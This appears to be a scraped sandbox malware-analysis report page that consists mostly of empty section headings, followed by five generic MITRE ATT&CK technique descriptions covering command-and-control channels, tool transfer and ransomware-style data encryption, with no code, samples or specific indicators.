Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre